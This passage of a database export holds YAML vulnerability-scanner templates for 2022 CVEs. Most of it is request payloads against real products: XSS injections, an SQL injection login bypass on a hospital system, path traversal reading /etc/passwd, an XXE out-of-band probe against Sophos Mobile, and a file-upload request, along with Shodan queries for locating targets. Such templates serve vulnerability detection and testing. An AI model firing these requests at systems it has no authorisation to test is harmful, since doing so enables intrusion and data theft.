https://nvd.nist.gov/vuln/detail/CVE-2022-38463\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/Henry4E36/POCS\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-38463\n cwe-id: CWE-79\n epss-score: 0.00174\n epss-percentile: 0.53646\n cpe: cpe:2.3:a:servicenow:servicenow:san_diego:patch_4:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: servicenow\n product: servicenow\n shodan-query: http.title:\"ServiceNow\"\n tags: cve,cve2022,servicenow,xss\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/logout_redirect.do?sysparm_url=//j%5c%5cjavascript%3aalert(document.domain)\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"top.location.href = 'javascript:alert(document.domain)';\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220602dde2b93eb0d41d3c031c0120a9007197dfb886c56eb72c39a68e752d55dde022100f6fd085c092dc14047ca0974a626fcb410641ff5f391c3d454c2707f5efd823a:922c64590222798bb761d5b6d8e72950", "hash": "f69b6e2b6bcf8c69b0fba777248b8522", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308577" }, "name": "CVE-2022-38467.yaml", "content": "id: CVE-2022-38467\n\ninfo:\n name: CRM Perks Forms < 1.1.1 - Cross Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n The plugin does not sanitise and escape some parameters from a sample file before outputting them back in the page, leading to Reflected Cross-Site Scripting\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: Fixed in version 1.1.1\n reference:\n - https://wpscan.com/vulnerability/4b128c9c-366e-46af-9dd2-e3a9624e3a53\n - https://wordpress.org/plugins/crm-perks-forms/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-38467\n - https://patchstack.com/database/vulnerability/crm-perks-forms/wordpress-crm-perks-forms-plugin-1-1-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-38467\n cwe-id: CWE-79\n epss-score: 0.00092\n epss-percentile: 0.37951\n cpe: cpe:2.3:a:crmperks:crm_perks_forms:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: crmperks\n product: crm_perks_forms\n framework: wordpress\n tags: cve2022,cve,crm-perks-forms,wpscan,wordpress,wp,wp-plugin,xss,crmperks\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/crm-perks-forms/readme.txt HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /wp-content/plugins/crm-perks-forms/templates/sample_file.php?FirstName=&LastName=&%20Company= HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_1 == 200'\n - 'contains(content_type_2, \"text/html\")'\n - 'contains(body_1, \"CRM Perks Forms\") && contains(body_2, \"\")'\n condition: and\n# digest: 490a004630440220729431423049e0675d567b6cbd1d77e01b4e70f542ae8a569d9765cf8dcd344b02205d87faab9dfcd79998b0d0e68c7e91eb95180dd93bf447409ae8c7579e50761b:922c64590222798bb761d5b6d8e72950", "hash": "fadaa8e307930a6e7a0ffd2796a075c1", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308578" }, "name": "CVE-2022-38553.yaml", "content": "id: CVE-2022-38553\n\ninfo:\n name: Academy Learning Management System <5.9.1 - Cross-Site Scripting\n author: edoardottt\n severity: medium\n description: |\n Academy Learning Management System before 5.9.1 contains a cross-site scripting vulnerability via the Search parameter. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: |\n Upgrade to Academy Learning Management System version 5.9.1 or later to mitigate the XSS vulnerability.\n reference:\n - https://www.youtube.com/watch?v=yFiZffHoeKs&ab_channel=4websecurity\n - https://github.com/4websecurity/CVE-2022-38553\n - https://codecanyon.net/item/academy-course-based-learning-management-system/22703468\n - https://nvd.nist.gov/vuln/detail/CVE-2022-38553\n - http://academy.com\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-38553\n cwe-id: CWE-79\n epss-score: 0.00218\n epss-percentile: 0.5972\n cpe: cpe:2.3:a:creativeitem:academy_learning_management_system:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: creativeitem\n product: academy_learning_management_system\n google-query: intext:\"Study any topic, anytime\"\n tags: cve2022,cve,academylms,xss,creativeitem\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/search?query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\">'\n - 'Study any topic'\n condition: and\n\n - type: word\n part: header\n words:\n - 'text/html'\n\n - type: status\n status:\n - 200\n# digest: 490a004630440220198f27be524ccad8572426583afc7404f4eadb4ee97c8673dfcc45c69474e4cc02205db8821d527e95ccb104e194cba4ad01b37bd10b23d007f2b2b49dd6dbc40b62:922c64590222798bb761d5b6d8e72950", "hash": "a1f8fd07dafae6579b098717509e3135", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308579" }, "name": "CVE-2022-38637.yaml", "content": "id: CVE-2022-38637\n\ninfo:\n name: Hospital Management System 1.0 - SQL Injection\n author: arafatansari\n severity: critical\n description: |\n Hospital Management System 1.0 contains a SQL injection vulnerability via the editid parameter in /HMS/user-login.php. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.youtube.com/watch?v=m8nW0p69UHU\n - https://owasp.org/www-community/attacks/SQL_Injection\n - https://nvd.nist.gov/vuln/detail/CVE-2022-38637\n - https://github.com/Henry4E36/POCS\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-38637\n cwe-id: CWE-89\n epss-score: 0.01231\n epss-percentile: 0.85126\n cpe: cpe:2.3:a:hospital_management_system_project:hospital_management_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: hospital_management_system_project\n product: hospital_management_system\n shodan-query: http.html:\"Hospital Management System\"\n tags: cve,cve2022,hms,cms,sqli,auth-bypass,hospital_management_system_project\n\nhttp:\n - raw:\n - |\n POST /hms/user-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n username=admin%27+or+%271%27%3D%271%27%23&password=admin%27+or+%271%27%3D%271%27%23&submit=\n\n host-redirects: true\n max-redirects: 2\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'User | Dashboard'\n - 'Book My Appointment'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100a8383f340fa0dfe055b740805fc9006b8240efd45919da33d427bf756f32ea3002202ce22932462286045aba1b3fcbf86f9f3abb7035232fbf32730b0d01b48c2f4b:922c64590222798bb761d5b6d8e72950", "hash": "1fb29f8d7f7b64d4109eeb7f86239f60", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30857a" }, "name": "CVE-2022-38794.yaml", "content": "id: CVE-2022-38794\n\ninfo:\n name: Zaver - Local File Inclusion\n author: pikpikcu\n severity: high\n description: |\n Zaver through 2020-12-15 is vulnerable to local file inclusion via the GET /.. substring.\n impact: |\n This vulnerability can lead to unauthorized access, data leakage, and remote code execution.\n remediation: |\n To remediate this vulnerability, ensure that user input is properly validated and sanitized before being used in file inclusion operations.\n reference:\n - https://github.com/zyearn/zaver/issues/22\n - https://nvd.nist.gov/vuln/detail/CVE-2022-38794\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-38794\n cwe-id: CWE-22\n epss-score: 0.00536\n epss-percentile: 0.7469\n cpe: cpe:2.3:a:zaver_project:zaver:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: zaver_project\n product: zaver\n tags: cve,cve2022,lfi,zaver,zaver_project\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/../../../../../../../../etc/passwd'\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:[x*]:0:0\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402200ed779a9f9687940b2962eb1cb81f498633c303dafce9c65a87715c7441bba2302202d18e5e190defccdc3cd1e37a554cbd556bac428d069591d6ebf5e90df3e8ba1:922c64590222798bb761d5b6d8e72950", "hash": "a2b010e791790803785437840ba13145", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30857b" }, "name": "CVE-2022-38817.yaml", "content": "id: CVE-2022-38817\n\ninfo:\n name: Dapr Dashboard 0.1.0-0.10.0 - Improper Access Control\n author: For3stCo1d\n severity: high\n description: |\n Dapr Dashboard 0.1.0 through 0.10.0 is susceptible to improper access control. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n The vulnerability allows unauthorized access to the Dapr Dashboard, potentially leading to unauthorized actions and data exposure.\n remediation: |\n Upgrade Dapr Dashboard to a version that includes the fix for CVE-2022-38817 or apply the necessary patches provided by the vendor.\n reference:\n - https://github.com/dapr/dashboard/issues/222\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38817\n - https://github.com/dapr/dashboard\n - https://nvd.nist.gov/vuln/detail/CVE-2022-38817\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-38817\n cwe-id: CWE-306\n epss-score: 0.01019\n epss-percentile: 0.82099\n cpe: cpe:2.3:a:linuxfoundation:dapr_dashboard:*:*:*:*:*:*:*:*\n metadata:\n max-request: 3\n vendor: linuxfoundation\n product: dapr_dashboard\n shodan-query: http.title:\"Dapr Dashboard\"\n tags: cve,cve2022,dapr,dashboard,unauth,linuxfoundation\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/components/statestore\"\n - \"{{BaseURL}}/overview\"\n - \"{{BaseURL}}/controlplane\"\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'Dapr Dashboard'\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100ed31baef3a743912069b65ba5acc47646dcaf490915517bdd8e0e7ad7000e63002201f52667a811d396e971bdb076b9e20faf5f2855da5529fd33c7f57c62aca15cb:922c64590222798bb761d5b6d8e72950", "hash": "54bb32802dfda60638a447907038db60", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30857c" }, "name": "CVE-2022-38870.yaml", "content": "id: CVE-2022-38870\n\ninfo:\n name: Free5gc 3.2.1 - Information Disclosure\n author: For3stCo1d\n severity: high\n description: |\n Free5gc 3.2.1 is susceptible to information disclosure. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n Successful exploitation of this vulnerability could result in unauthorized access to sensitive information.\n remediation: |\n Apply the latest patch or upgrade to a patched version of Free5gc 3.2.1 to mitigate the vulnerability.\n reference:\n - https://github.com/free5gc/free5gc/issues/387\n - https://nvd.nist.gov/vuln/detail/CVE-2022-38870\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/Henry4E36/POCS\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-38870\n cwe-id: CWE-306\n epss-score: 0.01064\n epss-percentile: 0.83839\n cpe: cpe:2.3:a:free5gc:free5gc:3.2.1:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: free5gc\n product: free5gc\n shodan-query: http.title:\"free5GC Web Console\"\n tags: cve,cve2022,free5gc,exposure\n\nhttp:\n - raw:\n - |\n GET /api/subscriber HTTP/1.1\n Host: {{Hostname}}\n Token: admin\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\"plmnID\":'\n - '\"ueId\":'\n condition: and\n\n - type: word\n part: header\n words:\n - \"application/json\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100b1bc52241353b36e1a5999a82f529fbbc762b7a9979290d5bbe230ab8d331b1102201bfc8ecd065a544dbcd51dd648a5542814bd55243221a48cceccfba368e17784:922c64590222798bb761d5b6d8e72950", "hash": "a0da0b3603f8cb9e86f8226fa8673846", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30857d" }, "name": "CVE-2022-39048.yaml", "content": "id: CVE-2022-39048\n\ninfo:\n name: ServiceNow - Cross-site Scripting\n author: theamanrawat\n severity: medium\n description: |\n A XSS vulnerability was identified in the ServiceNow UI page assessment_redirect. To exploit this vulnerability, an attacker would need to persuade an authenticated user to click a maliciously crafted URL. Successful exploitation potentially could be used to conduct various client-side attacks, including, but not limited to, phishing, redirection, theft of CSRF tokens, and use of an authenticated user's browser or session to attack other systems.\n reference:\n - https://support.servicenow.com/kb?id=kb_article_view&sysparm_article=KB1221892\n - https://blog.amanrawat.in/2023/05/05/CVE-2022-39048.html\n - https://nvd.nist.gov/vuln/detail/CVE-2022-39048\n - https://support.servicenow.com/\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-39048\n cwe-id: CWE-79\n epss-score: 0.01306\n epss-percentile: 0.8443\n cpe: cpe:2.3:a:servicenow:servicenow:quebec:-:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: servicenow\n product: servicenow\n shodan-query: http.title:\"ServiceNow\"\n tags: cve,cve2022,xss,servicenow,authenticated\n\nhttp:\n - raw:\n - |\n GET /navpage.do HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /login.do HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n sysparm_ck={{csrf}}&user_name={{username}}&user_password={{password}}¬_important=&ni.nolog.user_password=true&ni.noecho.user_name=true&ni.noecho.user_password=true&screensize=1920x1080&sys_action=sysverb_login&sysparm_login_url=welcome.do\n - |\n GET /assessment_redirect.do?sysparm_survey_url=javascript:alert(document.domain)//assessment_take2.do HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body_3\n words:\n - 'unwrapped_url = \"javascript:alert(document.domain)//assessment_take2.do\"'\n - 'assessment_list.do'\n condition: and\n\n - type: word\n part: header_3\n words:\n - 'text/html'\n\n - type: status\n part: header_3\n status:\n - 200\n\n extractors:\n - type: regex\n name: csrf\n part: body\n group: 1\n regex:\n - 'name=\"sysparm_ck\" id=\"sysparm_ck\" type=\"hidden\" value=\"(.*?)\"'\n internal: true\n# digest: 4a0a0047304502202102f0fca3b27948107e82e0f1edb665eef04e734cb8223f72f8610fd0a77db7022100f66594372604dbb07eac6b1f2e2eaa0d92054b7cf0f0179d3f3b2278a84506fc:922c64590222798bb761d5b6d8e72950", "hash": "3f123157d1380a466468bbf8aadb29bf", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30857e" }, "name": "CVE-2022-3908.yaml", "content": "id: CVE-2022-3908\n\ninfo:\n name: WordPress Helloprint <1.4.7 - Cross-Site Scripting\n author: theamanrawat\n severity: medium\n description: |\n WordPress Helloprint plugin before 1.4.7 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could lead to cross-site scripting (XSS) attacks, potentially allowing an attacker to execute malicious scripts on the victim's browser.\n remediation: Fixed in version 1.4.7.\n reference:\n - https://wpscan.com/vulnerability/c44802a0-8cbe-4386-9523-3b6cb44c6505\n - https://wordpress.org/plugins/helloprint/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-3908\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-3908\n cwe-id: CWE-79\n epss-score: 0.00119\n epss-percentile: 0.45893\n cpe: cpe:2.3:a:helloprint:helloprint:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: helloprint\n product: helloprint\n framework: wordpress\n tags: cve,cve2022,xss,wordpress,wp-plugin,helloprint,wp,authenticated,wpscan\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=language-translate.php&success=added\"> successfully\")'\n condition: and\n# digest: 490a0046304402207e286204c09dd09c8f88d70cfffd4057fb812e02c12e9f8d003c9cbe275bac56022046153de04d2c4740670bdce031f4191724837e97543756dad26a518e21d528f9:922c64590222798bb761d5b6d8e72950", "hash": "03c35aa16760a4802d809cbe5f57f599", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30857f" }, "name": "CVE-2022-39195.yaml", "content": "id: CVE-2022-39195\n\ninfo:\n name: LISTSERV 17 - Cross-Site Scripting\n author: arafatansari\n severity: medium\n description: |\n LISTSERV 17 web interface contains a cross-site scripting vulnerability. An attacker can inject arbitrary JavaScript or HTML via the \"c\" parameter, thereby possibly allowing the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability.\n reference:\n - https://packetstormsecurity.com/files/170552/LISTSERV-17-Cross-Site-Scripting.html\n - https://peach.ease.lsoft.com/scripts/wa-PEACH.exe?A0=LSTSRV-L\n - https://packetstormsecurity.com/2301-exploits/listserv17-xss.txt\n - https://nvd.nist.gov/vuln/detail/CVE-2022-39195\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-39195\n cwe-id: CWE-79\n epss-score: 0.00211\n epss-percentile: 0.58386\n cpe: cpe:2.3:a:lsoft:listserv:17.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: lsoft\n product: listserv\n shodan-query: http.html:\"LISTSERV\"\n tags: cve,cve2022,xss,listserv,packetstorm,lsoft\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/scripts/wa.exe?TICKET=test&c=%3Cscript%3Ealert(document.domain)%3C/script%3E\"\n - \"{{BaseURL}}/scripts/wa-HAP.exe?TICKET=test&c=%3Cscript%3Ealert(document.domain)%3C/script%3E\"\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"\"\n - \"LISTSERV\"\n case-insensitive: true\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100deb484913d771058cb07f05ff44b039c31713806ae1d7dc76ab917a696784c1602204cc67b35d929a40ecbf2769707cf7c05748309ec523759fa82bd301d0c1751f4:922c64590222798bb761d5b6d8e72950", "hash": "077c43a893646d26d0501f6d9d7c50fb", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308580" }, "name": "CVE-2022-3933.yaml", "content": "id: CVE-2022-3933\n\ninfo:\n name: WordPress Essential Real Estate <3.9.6 - Authenticated Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n WordPress Essential Real Estate plugin before 3.9.6 contains an authenticated cross-site scripting vulnerability. The plugin does not sanitize and escape some parameters, which can allow someone with a role as low as admin to inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow theft of cookie-based authentication credentials and launch of other attacks.\n impact: |\n An authenticated attacker can inject malicious scripts into the website, potentially leading to unauthorized access, data theft, or further attacks.\n remediation: Fixed in version 3.9.6.\n reference:\n - https://wpscan.com/vulnerability/6395f3f1-5cdf-4c55-920c-accc0201baf4\n - https://wordpress.org/plugins/essential-real-estate/advanced/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-3933\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/cyllective/CVEs\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2022-3933\n cwe-id: CWE-79\n epss-score: 0.00092\n epss-percentile: 0.37956\n cpe: cpe:2.3:a:g5theme:essential_real_estate:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: g5theme\n product: essential_real_estate\n framework: wordpress\n tags: cve,cve2022,wpscan,authenticated,wordpress,wp-plugin,wp,essential-real-estate,xss,g5theme\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin-ajax.php?action=ere_property_gallery_fillter_ajax&columns_gap=%22%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3C!-- HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(header_2, \"text/html\")'\n - 'contains(body_2, \">\")'\n - 'contains(body_2, \"ere_property_gallery\")'\n condition: and\n# digest: 490a0046304402200fe935b7c005247f683b953718e68e4676806de61fba39833160c8503149843f0220541a0e4a4597d27026619f26e233f4d496a8860c45a55e6254286e1975f5b1d1:922c64590222798bb761d5b6d8e72950", "hash": "0971bbdea0553a13210cc9d6bb05df38", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308581" }, "name": "CVE-2022-3934.yaml", "content": "id: CVE-2022-3934\n\ninfo:\n name: WordPress FlatPM <3.0.13 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n WordPress FlatPM plugin before 3.0.13 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape certain parameters before outputting them back in pages, which can be exploited against high privilege users such as admin. An attacker can steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: Fixed in version 3.0.13.\n reference:\n - https://wpscan.com/vulnerability/ab68381f-c4b8-4945-a6a5-1d4d6473b73a\n - https://nvd.nist.gov/vuln/detail/CVE-2022-3934\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/cyllective/CVEs\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2022-3934\n cwe-id: CWE-79\n epss-score: 0.00092\n epss-percentile: 0.37956\n cpe: cpe:2.3:a:mehanoid:flat_pm:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: mehanoid\n product: flat_pm\n framework: wordpress\n tags: cve2022,cve,authenticated,wpscan,xss,flatpm,wordpress,wp-plugin,mehanoid\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n @timeout: 10s\n GET /wp-admin/admin.php?page=blocks_form&block_cat_ID=1%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29%2F%2F HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(body_2, \"alert(document.domain)\") && contains(body_2, \"Flat PM\")'\n condition: and\n# digest: 4a0a00473045022055fba672dad146e93dacb3d50e8711c24f62824a1537c6528e556035e547b531022100c5aff9e112c142313578fb3dfb3657b394dd081730b12452893b6e84b0fa8007:922c64590222798bb761d5b6d8e72950", "hash": "a4d0a72ee8fe8407ef90698cb3cf4127", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308582" }, "name": "CVE-2022-3980.yaml", "content": "id: CVE-2022-3980\n\ninfo:\n name: Sophos Mobile managed on-premises - XML External Entity Injection\n author: dabla\n severity: critical\n description: |\n An XML External Entity (XXE) vulnerability allows server-side request forgery (SSRF) and potential code execution in Sophos Mobile managed on-premises between versions 5.0.0 and 9.7.4.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to read arbitrary files on the server or conduct server-side request forgery (SSRF) attacks.\n remediation: |\n Apply the latest security patches or updates provided by Sophos to mitigate the vulnerability.\n reference:\n - https://www.sophos.com/en-us/security-advisories/sophos-sa-20221116-smc-xee\n - https://nvd.nist.gov/vuln/detail/CVE-2022-3980\n - https://github.com/bigblackhat/oFx\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-3980\n cwe-id: CWE-611\n epss-score: 0.49036\n epss-percentile: 0.97431\n cpe: cpe:2.3:a:sophos:mobile:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: sophos\n product: mobile\n shodan-query: http.favicon.hash:-1274798165\n fofa-query: title=\"Sophos Mobile\"\n tags: cve,cve2022,xxe,ssrf,sophos\n\nhttp:\n - raw:\n - |\n @timeout: 50s\n POST /servlets/OmaDsServlet HTTP/1.1\n Host: {{Hostname}}\n Content-Type: \"application/xml\"\n\n \n %test;]>\n test\n\n redirects: true\n max-redirects: 3\n matchers:\n - type: dsl\n dsl:\n - \"contains(interactsh_protocol, 'http') || contains(interactsh_protocol, 'dns')\"\n - \"status_code == 400\"\n - \"len(body) == 0\"\n condition: and\n# digest: 490a0046304402203c485611836eec10a1ed541a3725bc35ddc5c20287b97f2ac232d2da614d03c202202fe8d887267e1145fd5315a3ce8588e05e684c7f439e5a7ca6ed2bf669c27137:922c64590222798bb761d5b6d8e72950", "hash": "23ad0617aeb4f2fe81fe241a0d6c3e80", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308583" }, "name": "CVE-2022-3982.yaml", "content": "id: CVE-2022-3982\n\ninfo:\n name: WordPress Booking Calendar <3.2.2 - Arbitrary File Upload\n author: theamanrawat\n severity: critical\n description: |\n WordPress Booking Calendar plugin before 3.2.2 is susceptible to arbitrary file upload possibly leading to remote code execution. The plugin does not validate uploaded files, which can allow an attacker to upload arbitrary files, such as PHP, and potentially obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n This vulnerability can lead to remote code execution, allowing attackers to take control of the affected WordPress website.\n remediation: Fixed in 3.2.2.\n reference:\n - https://wpscan.com/vulnerability/4d91f3e1-4de9-46c1-b5ba-cc55b7726867\n - https://wordpress.org/plugins/booking-calendar/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-3982\n - https://github.com/cyllective/CVEs\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-3982\n cwe-id: CWE-434\n epss-score: 0.20211\n epss-percentile: 0.96236\n cpe: cpe:2.3:a:wpdevart:booking_calendar:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: wpdevart\n product: booking_calendar\n framework: wordpress\n tags: cve,cve2022,rce,wpscan,wordpress,wp-plugin,wp,booking-calendar,unauthenticated,intrusive,wpdevart\n\nhttp:\n - raw:\n - |\n GET / HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /wp-admin/admin-ajax.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: multipart/form-data; boundary=------------------------1cada150a8151a54\n\n --------------------------1cada150a8151a54\n Content-Disposition: form-data; name=\"action\"\n\n wpdevart_form_ajax\n --------------------------1cada150a8151a54\n Content-Disposition: form-data; name=\"wpdevart_id\"\n\n x\n --------------------------1cada150a8151a54\n Content-Disposition: form-data; name=\"wpdevart_nonce\"\n\n {{nonce}}\n --------------------------1cada150a8151a54\n Content-Disposition: form-data; name=\"wpdevart_data\"\n\n {\"wpdevart-submit\":\"X\"}\n --------------------------1cada150a8151a54\n Content-Disposition: form-data; name=\"wpdevart-submit\"\n\n 1\n --------------------------1cada150a8151a54\n 